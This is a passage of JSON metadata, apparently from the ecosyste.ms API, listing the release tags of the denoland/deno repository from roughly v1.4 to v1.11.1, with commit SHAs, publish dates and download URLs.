:null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655